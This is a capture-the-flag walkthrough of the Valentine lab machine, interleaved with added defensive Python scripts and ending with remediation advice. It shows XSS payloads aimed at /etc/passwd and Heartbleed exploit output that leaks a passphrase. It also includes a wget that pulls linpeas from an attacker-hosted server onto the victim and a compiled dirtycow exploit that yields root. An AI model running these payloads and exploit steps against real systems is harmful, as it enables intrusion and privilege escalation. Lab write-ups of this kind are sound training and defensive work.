Enumeration
rustscan and nmap go first.
nmap
Command: nmap -A -p- -T4 -Pn -vv -oN nmap-report-tcp.txt 10.10.10.79
Result:
Nmap scan report for 10.10.10.79
Host is up, received user-set (0.31s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| ...
80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-methods:
|_ Supported Methods: HEAD POST
443/tcp open ssl/http syn-ack Apache httpd 2.2.22 ((Ubuntu))
|_ssl-date: 2023-09-21T14:53:26+00:00; 0s from scanner time.
| http-methods:
|_ Supported Methods: POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2018-02-06T00:45:25
| Not valid after: 2019-02-06T00:45:25
| MD5: a413:c4f0:b145:2154:fb54:b2de:c7a9:809d
| SHA-1: 2303:80da:60e7:bde7:2ba6:76dd:5214:3c3c:6f53:01b1
| -----BEGIN CERTIFICATE-----
|...
|_-----END CERTIFICATE-----
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 0s
rustscan:
Command: rustscan -a 10.10.10.79 -r 1-65535 --ulimit 5000 -- -A
Result:
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.79:22
Open 10.10.10.79:80
Open 10.10.10.79:443
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A" on ip 10.10.10.79
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94 ( https://nmap.org )
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| ssh-dss ...
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRkMHjbGnQ7uoYx7HPJoW9Up+q0NriI5g5xAs1+0gYBVtBqPxi86gPtXbMHGSrpTiX854nsOPWA8UgfBOSZ2TgWeFvmcnRfUKJG9GR8sdIUvhKxq6ZOtUePereKr0bvFwMSl8Qtmo+KcRWvuxKS64RgUem2TVIWqStLJoPxt8iDPPM7929EoovpooSjwPfqvEhRMtq+KKlqU6PrJD6HshGdjLjABYY1ljfKakgBfWic+Y0KWKa9qdeBF09S7WlaUBWJ5SutKlNSwcRBBVbL4ZFcHijdlXCvfVwSVMkiqY7x4V4McsNpIzHyysZUADy8A6tbfSgopaeR2UN4QRgM1dX
| 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+pCNI5Xv8P96CmyDi/EIvyL0LVZY2xAUJcA0G9rFdLJnIhjvmYuxoCQDsYl+LEiKQee5RRw9d+lgH3Fm5O9XI=
80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http syn-ack Apache httpd 2.2.22 ((Ubuntu))
|_ssl-date: 2023-09-21T14:26:53+00:00; 0s from scanner time.
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2018-02-06T00:45:25
| Not valid after: 2019-02-06T00:45:25
| MD5: a413:c4f0:b145:2154:fb54:b2de:c7a9:809d
| SHA-1: 2303:80da:60e7:bde7:2ba6:76dd:5214:3c3c:6f53:01b1
| -----BEGIN CERTIFICATE-----
| ...
|_-----END CERTIFICATE-----
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 0s
rustscan and nmap found ports 22, 80, and 443 open, and the TLS certificate gives the hostname valentine.htb.
I add valentine.htb to /etc/hosts and browse the site to see what it is about. HTTP and HTTPS give the same result.
It runs Apache HTTP Server 2.2.22 and PHP 5.3.10 on Ubuntu.
With nothing else to discover on the page itself, I use dirbuster for directory busting and gobuster for DNS busting. feroxbuster would give recursive results, but I'll stick to these first.
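The ssl-cert block in the nmap output above already contains findings a defender would act on. The following Python script is an added example, not part of the original write-up: it parses that block (copied from the nmap output above, trimmed to the fields it uses) and flags a self-signed certificate, a validity window that has expired relative to the scan time on the ssl-date line, a SHA-1 signature, and short RSA keys. The field names are nmap's; the function names are mine.

```python
import re
from datetime import datetime, timezone

# Copied from the nmap ssl-cert block above (abbreviated to the fields the check uses).
SAMPLE_SSL_CERT_BLOCK = """\
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2018-02-06T00:45:25
| Not valid after: 2019-02-06T00:45:25
"""

# Scan time taken from the "ssl-date" line of the same nmap run.
SCAN_TIME = datetime(2023, 9, 21, 14, 53, 26, tzinfo=timezone.utc)

# Matches "| Field: value" and "|_Field: value" lines of an nmap script block.
FIELD_RE = re.compile(r"^\|_?\s*(?:ssl-cert: )?([A-Za-z ]+?):\s*(.+)$")


def parse_ssl_cert_block(block: str) -> dict:
    """Turn nmap's ssl-cert script lines into a {field: value} dict."""
    fields = {}
    for line in block.splitlines():
        m = FIELD_RE.match(line.strip())
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def audit_certificate(fields: dict, now: datetime) -> list:
    """Return a list of human-readable findings for the parsed certificate."""
    findings = []
    if fields.get("Subject") == fields.get("Issuer"):
        findings.append("self-signed certificate (Subject == Issuer)")
    # nmap prints naive UTC timestamps; attach the timezone before comparing.
    not_before = datetime.fromisoformat(fields["Not valid before"]).replace(tzinfo=timezone.utc)
    not_after = datetime.fromisoformat(fields["Not valid after"]).replace(tzinfo=timezone.utc)
    if now > not_after:
        findings.append(f"certificate expired on {not_after.date()}")
    elif now < not_before:
        findings.append("certificate not yet valid")
    sig = fields.get("Signature Algorithm", "").lower()
    if sig.startswith("sha1") or sig.startswith("md5"):
        findings.append(f"weak signature algorithm {fields['Signature Algorithm']}")
    if fields.get("Public Key type") == "rsa" and int(fields.get("Public Key bits", "0")) < 2048:
        findings.append("RSA key shorter than 2048 bits")
    return findings


if __name__ == "__main__":
    for finding in audit_certificate(parse_ssl_cert_block(SAMPLE_SSL_CERT_BLOCK), SCAN_TIME):
        print("[!]", finding)
```

Run against the block above it reports a self-signed certificate, an expiry more than four years before the scan, and a SHA-1 signature; the key length passes. Those are exactly the details the summary later says should be checked during enumeration.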
Command: dirbuster
Target URL: http://valentine.htb:80
Number of Threads: 200
Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
File extension: php,txt
Use blank extension: true
Command: gobuster dns -d "valentine.htb" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
Result:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: valentine.htb
[+] Threads: 100
[+] Timeout: 1s
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================
Gobuster found nothing, but dirbuster found some interesting directories.
Before going through the list of directories one by one, I run nikto in case there are interesting findings I missed.
Command: nikto -url http://valentine.htb
Result:
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.79
+ Target Hostname: valentine.htb
+ Target Port: 80
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /dev/: Directory indexing found.
+ /dev/: This might be interesting.
+ /icons/README: Server may leak inodes via ETags, header found with file /icons/README, inode: 121971, size: 5108, mtime: Tue Aug 28 17:48:10 2007. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8769 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2023-09-21 22:59:09 (GMT7) (2717 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
/index.php has the same content as before.
/cgi-bin is forbidden. At least the error page tells me it uses Apache 2.2.22.
Dirbuster finds /cgi-bin. Remembering the Shocker HTB box, where the vulnerability was an executable Common Gateway Interface (CGI) script inside that directory, I decided to use gobuster to search for any files in it.
Command: gobuster dir -u https://valentine.htb/cgi-bin -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt -x sh,cgi,c,pl,py,rb -k -f
Result:
None
/doc is forbidden too. Maybe I could use gobuster there to see if any files are lying around, but later, after the cgi-bin search has finished.
/icons/ gives the same result.
/dev/ is interesting: there are two files, notes.txt and hype_key.
notes.txt seems to say that the encoder/decoder is broken.
I think this relates to /decode.php and /encode.php.
My guess is that it decodes hex to a string and vice versa. Trying to decode hype_key with /decode.php failed.
Trying CyberChef instead, pasting it into the input and using the "From Hex" recipe, I get an RSA private key. My guess is that this is an SSH key.
So I stored it in a file named hash_key on my machine. Now what I have to do is find the username.
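A hex-encoded private key sitting in a web-served directory is the kind of exposure a secret scanner should catch before an attacker does. The following Python function is an added example, not part of the original write-up: it looks for PEM private-key blocks in a file's raw content and in its hex- and base64-decoded forms, and reports whether the key is passphrase-protected (the Proc-Type/DEK-Info headers mentioned later in this post). The sample key body is constructed and non-functional; it is not hype_key.

```python
import base64
import binascii
import re

# PEM private-key block (RSA, DSA, EC, OpenSSH or PKCS#8), with matching END line.
PEM_KEY_RE = re.compile(
    rb"-----BEGIN ((?:RSA |DSA |EC |OPENSSH |ENCRYPTED )?PRIVATE KEY)-----"
    rb"(.*?)-----END \1-----",
    re.DOTALL,
)


def _candidates(data: bytes):
    """Yield (encoding, bytes) for the raw content and its hex/base64 decodings."""
    yield "raw", data
    compact = b"".join(data.split())  # drop whitespace and newlines before decoding
    try:
        yield "hex", binascii.unhexlify(compact)
    except (binascii.Error, ValueError):
        pass
    try:
        yield "base64", base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        pass


def find_private_keys(data: bytes) -> list:
    """Return one finding per PEM private key found in any supported encoding."""
    findings = []
    for encoding, blob in _candidates(data):
        for match in PEM_KEY_RE.finditer(blob):
            key_type, body = match.group(1), match.group(2)
            # Legacy PEM marks passphrase protection with Proc-Type/DEK-Info headers;
            # PKCS#8 uses the "ENCRYPTED PRIVATE KEY" label instead.
            encrypted = (
                b"Proc-Type: 4,ENCRYPTED" in body
                or b"DEK-Info:" in body
                or key_type == b"ENCRYPTED PRIVATE KEY"
            )
            findings.append({"encoding": encoding, "type": key_type.decode(), "encrypted": encrypted})
    return findings


# Constructed sample: a fake key body with the legacy encryption headers,
# hex-encoded the way hype_key was served. It is not a usable key.
SAMPLE_PEM = (
    b"-----BEGIN RSA PRIVATE KEY-----\n"
    b"Proc-Type: 4,ENCRYPTED\n"
    b"DEK-Info: AES-128-CBC,00000000000000000000000000000000\n"
    b"\n"
    b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
    b"-----END RSA PRIVATE KEY-----\n"
)
SAMPLE_HEX = binascii.hexlify(SAMPLE_PEM)

if __name__ == "__main__":
    for f in find_private_keys(SAMPLE_HEX):
        print(f"{f['type']} found ({f['encoding']}-encoded), passphrase-protected: {f['encrypted']}")
```

Pointing this at a web root (or a repository) finds keys whether they were committed as-is or "hidden" behind a trivial encoding; an unprotected key is the more urgent finding, but a passphrase-protected one is still exposure because the passphrase can be attacked offline.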
Foothold
Enumerating again, I find out that the encoder encodes a string to base64.
The input field is worth enumerating further to see if there are any vulnerabilities in it. But since all of the input is just base64 encoded or decoded, it might be a bit hard. Here is the list of things I tried:
- Code Injection
Payload: <?php phpinfo(); ?>
Result: None
Reason: There might be a mistake in input sanitation.
- SQL Injection
Payload: ';# --
Result: None
Reason: There might be a mistake in input sanitation and the server might use a DB. It's a little unreasonable based on the enumeration, but it won't hurt to try.
- Server Side Template Injection
Payload: {{7*'7'}}
Result: None
Reason: There might be a mistake in input sanitation and the server might use a template engine. I know it's not PHP Twig, Python Jinja, or the like. It's a little unreasonable, but it won't hurt to try.
- XSS Injection
Payload: <script>alert(1)</script>
Result: It works
Reason: There might be a mistake in input sanitation on the client side. Let's see if I can use it to extract the /etc/passwd file.
This does give me an idea: what if I can inject through base64 and have it print the file? I'll try later.
Payload:
- <img src="" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
- <img src="" onerror="document.write('<iframe src=file://../../../../../../../../etc/passwd></iframe>')"/>
- PGltZyBzcmM9IiIgb25lcnJvcj0iZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgc3JjPWZpbGU6Ly8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkPjwvaWZyYW1lPicpIi8+
- <img src="" onerror="document.write('<iframe src=file:%2f%2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2f%2e%2e$2fetc%2fpasswd></iframe>')"/>
Result:
There might be more payloads to try against it, but for now I'll move on. The /omg picture is interesting because of the possibility of steganography. I saved the file using wget and tried to see if there is any hidden data inside it.
I found nothing using binwalk.
Command: binwalk -e --signature omg
One thing left to try before going back to injection in the input field: spray hash_key against several suspected usernames over SSH. I changed its permissions with chmod 600 hash_key first. As expected, a passphrase is required. I tried "omg", "OMG", "ohmygod", and "OhMyGod", but with no result.
So I reverse image search the picture to see if there is any hint. I found the illustrator through one of the articles that used the same picture. His name is Ernesto Víctor Saúl Herrera Hernández. I might try that as a password or username. It seems I went down a rabbit hole.
Just now I remember that I can try to crack hash_key with john. Here is the link and this link that I used as a guide this time.
Command: john --wordlist=/usr/share/wordlists/rockyou.txt hash_key
Result:
0 password hashes cracked
It seems uncrackable for now. I've tried deleting the Proc-Type and DEK-Info headers, using ssh2john, and using john to crack it.
With nothing else in mind, I'm back to injection. Payloads:
<script>document.write('<iframe src=file:///../../../../../../../../etc/passwd></iframe>');</script>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
<?php echo("hello")
PD9waHAgZWNobygiaGkiKSA/Pg==
PGgxPjwvaDE+
Now I have a new idea: what if there is a vulnerability in the PHP 5.3.10 base64 encoder/decoder? I found nothing after searching the internet. Back at injection, I found out that HTML code can be injected.
After enumerating for a while, I found that "<?" and "</>" are being deleted. After two hours of head-scratching, I decided to take a break and look at what I've found.
I reverse image search the picture again and find this article. One thing I didn't check is SSL/TLS vulnerabilities, and that's what the picture is about: the Heartbleed vulnerability in OpenSSL's SSL/TLS implementation. So I run nmap to check whether the server is vulnerable, and it is.
Command: nmap -sV -p 443 --script=ssl-heartbleed.nse 10.10.10.79
Nmap scan report for valentine.htb (10.10.10.79)
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://cvedetails.com/cve/2014-0160/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://www.openssl.org/news/secadv_20140407.txt
Now that I know what it is, I find this script for the CVE on GitHub.
Command: python2 exploit.py valentine.htb
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
##################################################################
Connecting to: valentine.htb:443, 1 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0
WARNING: valentine.htb:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 1
##################################################################
.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==Nk....UP........t.h
There is a string that looks like base64. Taking it to CyberChef, I found that the password is heartbleedbelievethehype.
I get that it's a password, but I don't know the username yet. I try some of the enumerated names such as omg, valentine, and dev, and lastly hype, as the name hype_key suggests.
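To make concrete what nmap's "returned more data than it should" means, here is the server-side check that the Heartbleed fix adds, as an added example written for this write-up rather than code from the box, from OpenSSL, or from the exploit script. A heartbeat message carries a claimed payload_length; a safe implementation checks that claim against the bytes actually received before it copies or echoes anything, and silently drops the message otherwise. The message layout follows RFC 6520, the constant and function names are mine, and the two sample records are constructed, not captured traffic.

```python
import struct

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16  # RFC 6520: at least 16 bytes of padding must follow the payload


class HeartbeatError(ValueError):
    """Raised for any heartbeat message that must be discarded without a reply."""


def parse_heartbeat(record: bytes) -> bytes:
    """Validate a HeartbeatMessage body and return its payload.

    The claimed payload_length is compared with the record length that the
    TLS record layer actually delivered. This is the bounds check that the
    OpenSSL versions named in the nmap output above lacked (CVE-2014-0160).
    """
    if len(record) < 1 + 2 + MIN_PADDING:
        raise HeartbeatError("record too short for a heartbeat message")
    msg_type, payload_length = struct.unpack("!BH", record[:3])
    if msg_type != HEARTBEAT_REQUEST:
        raise HeartbeatError(f"unexpected heartbeat type {msg_type}")
    if 1 + 2 + payload_length + MIN_PADDING > len(record):
        # The peer claims more payload than it sent. A vulnerable peer would
        # copy payload_length bytes from memory anyway; we drop the message.
        raise HeartbeatError("payload_length exceeds record length")
    return record[3:3 + payload_length]


def is_safe_heartbeat(record: bytes) -> bool:
    """True if the record passes validation, False if it must be discarded."""
    try:
        parse_heartbeat(record)
        return True
    except HeartbeatError:
        return False


def build_heartbeat_response(record: bytes) -> bytes:
    """Echo only the validated payload (zero padding here; real peers use random bytes)."""
    payload = parse_heartbeat(record)
    return struct.pack("!BH", HEARTBEAT_RESPONSE, len(payload)) + payload + b"\x00" * MIN_PADDING


# Constructed samples. Both carry the 4-byte payload "ping"; the second one's
# header claims 0xFFFF bytes, which is the mismatch the check must reject.
GOOD_RECORD = struct.pack("!BH", HEARTBEAT_REQUEST, 4) + b"ping" + b"\x00" * MIN_PADDING
BAD_RECORD = struct.pack("!BH", HEARTBEAT_REQUEST, 0xFFFF) + b"ping" + b"\x00" * MIN_PADDING

if __name__ == "__main__":
    print("well-formed record accepted:", is_safe_heartbeat(GOOD_RECORD))
    print("over-long claim accepted:", is_safe_heartbeat(BAD_RECORD))
```

The response length is derived from the validated payload, never from the untrusted header field, which is the general rule behind the fix: a length that arrives on the wire is data, not a promise about the buffer. The operational remediation is still the one the summary gives, upgrading the library, since no application-level code on the box can patch the TLS stack beneath it.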
Privilege Escalation
I ran some basic enumeration for privilege escalation. Maybe there are some easy
Command: find / -perm -u=s -type f 2>/dev/null
Result (that might be interesting):
/bin/su
...
/usr/lib/pt_chown
...
/usr/bin/pkexec
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/newgrp
/usr/bin/lppasswd
/usr/bin/mtr
/usr/bin/chsh
/usr/bin/arping
...
/usr/sbin/uuidd
/usr/sbin/pppd
Command: sudo -l
Result: need password
Command: uname -a
Result: Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
Command: id
Result: uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare)
I'll run linpeas first to see if there is any kernel exploit I can use. Here is how I transfer it.
Attacker: python -m http.server 1234
Victim: wget http://10.10.14.2:1234/linpeas.sh
This is the list of kernel exploits that I get:
[+] [CVE-2016-5195] dirtycow
[+] [CVE-2016-5195] dirtycow 2
[+] [CVE-2013-2094] perf_swevent
[+] [CVE-2013-2094] perf_swevent 2
[+] [CVE-2021-4034] PwnKit
[+] [CVE-2015-3202] fuse (fusermount)
[+] [CVE-2014-4699] ptrace/sysret
[+] [CVE-2014-4014] inode_capable
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
[+] [CVE-2021-3156] sudo Baron Samedit
[+] [CVE-2021-3156] sudo Baron Samedit 2
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
[+] [CVE-2019-18634] sudo pwfeedback
[+] [CVE-2019-15666] XFRM_UAF
[+] [CVE-2018-1000001] RationalLove
[+] [CVE-2017-7308] af_packet
[+] [CVE-2017-6074] dccp
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
[+] [CVE-2017-1000253] PIE_stack_corruption
[+] [CVE-2016-2384] usb-midi
[+] [CVE-2015-9322] BadIRET
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
[+] [CVE-2014-5207] fuse_suid
[+] [CVE-2014-0196] rawmodePTY
[+] [CVE-2013-2094] semtex
[+] [CVE-2013-1959] userns_root_sploit
[+] [CVE-2013-0268] msr
[+] [CVE-2012-0809] death_star (sudo)
It suggests dirtycow as the first result. I'll try this exploit that I found on GitHub.
Command: gcc dirty.c -o dirty --static -lcrypt
The --static flag links the libraries into the ELF so it runs without depending on the victim's shared libraries. I transfer it to the victim and execute it. This might take a while.
And I got the root shell.
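The summary later notes that the dirtycow exploit works by backing up and replacing /etc/passwd. As an added example that is not part of the write-up, here is a small audit routine a defender can run over /etc/passwd to catch the traces that kind of tampering leaves: an extra uid-0 account, a password hash stored in passwd instead of shadow, a malformed line, or content that no longer matches a known-good hash. The sample file contents are constructed (the hype entry mirrors the id output above; the backdoor entry is invented).

```python
import hashlib
from typing import Optional

# Constructed sample: a clean passwd file and a tampered copy with an injected uid-0 account.
BASELINE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "hype:x:1000:1000:hype,,,:/home/hype:/bin/bash\n"
)
TAMPERED_PASSWD = BASELINE_PASSWD + "backdoor:$6$saltsalt$fakehash:0:0:pwned:/root:/bin/bash\n"


def parse_passwd(text: str) -> list:
    """Parse passwd(5) content; malformed lines are kept as records with an 'error' field."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            records.append({"line": lineno, "error": "expected 7 colon-separated fields"})
            continue
        name, pw, uid, gid, _gecos, _home, shell = fields
        try:
            records.append({
                "line": lineno, "name": name, "uid": int(uid), "gid": int(gid), "shell": shell,
                # "x" means the hash lives in /etc/shadow; "*", "!" and "" are locked accounts.
                "has_hash": pw not in ("x", "*", "!", ""),
            })
        except ValueError:
            records.append({"line": lineno, "error": "non-numeric uid/gid"})
    return records


def audit_passwd(text: str, expected_sha256: Optional[str] = None) -> dict:
    """Return the file's SHA-256 and a list of findings worth alerting on."""
    findings = []
    for r in parse_passwd(text):
        if "error" in r:
            findings.append(f"line {r['line']}: {r['error']}")
            continue
        if r["uid"] == 0 and r["name"] != "root":
            findings.append(f"line {r['line']}: extra uid-0 account {r['name']!r}")
        if r["has_hash"]:
            findings.append(f"line {r['line']}: password hash stored in passwd for {r['name']!r}")
    digest = hashlib.sha256(text.encode()).hexdigest()
    if expected_sha256 is not None and digest != expected_sha256:
        findings.append("file content differs from baseline")
    return {"sha256": digest, "findings": findings}


if __name__ == "__main__":
    baseline = audit_passwd(BASELINE_PASSWD)["sha256"]
    for finding in audit_passwd(TAMPERED_PASSWD, expected_sha256=baseline)["findings"]:
        print("[!]", finding)
```

In practice the baseline hash comes from a trusted snapshot (configuration management, a file-integrity tool, or the package manager), and the same idea extends to /etc/shadow and /etc/sudoers. Note that it detects the write after the fact; preventing it on a kernel this old comes down to the summary's "update and upgrade the OS".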
Summary
There are several vulnerabilities here, such as:
- Sensitive data exposure: notes.txt and hype_key in the /dev directory, error pages that show the server version, etc.
- XSS Injection (/encode.php and /decode.php).
- HTML Injection.
- Outdated SSL/TLS leads to Heartbleed (CVE-2014-0160).
- Local privilege escalation via the "Dirty Cow" vulnerability (CVE-2016-5195).
Remediation I would suggest:
- Move the sensitive data elsewhere and hide or remove the /dev directory.
- Strengthen the input sanitation.
- Upgrade the SSL/TLS library version.
- Update and upgrade the OS.
- Change the SSH port, disallow root login over SSH, or disable SSH entirely if it is not needed.
What didn't work for me:
- Cross-Site Scripting (XSS) Injection
- SQL Injection
- Server Side Template Injection (SSTI)
- Code Injection
What I can improve:
- Being quieter when scanning might be good.
- Exploiting with dirtycow might break the machine because it backs up /etc/passwd and replaces it.
- Try to be creative in making a payload.
What I learnt from this box:
- Always check every detail of the enumeration, such as the SSL/TLS version, the "hype" in "hype_key", etc.
- nmap scripts do help with checking for vulnerabilities.
- When doing privilege escalation, enumerate the Linux version first and test whether the exploit works. Maybe use LinEnum or linux-exploit-suggester, which linpeas includes.
- Using the "--static" flag in gcc helps to build a self-contained ELF file. If there are still dependencies, it might be better to use Docker with a matching environment.
- There are probably multiple ways to root this machine. Why? It's just a feeling, because I didn't enumerate the machine further: cronjobs, root-owned ELFs accessible to the user, etc.
This machine may well have several more vulnerabilities. Please let me know if you have any recommendations, criticism, or something I might have missed in this box. That's all folks. Thanks for reading.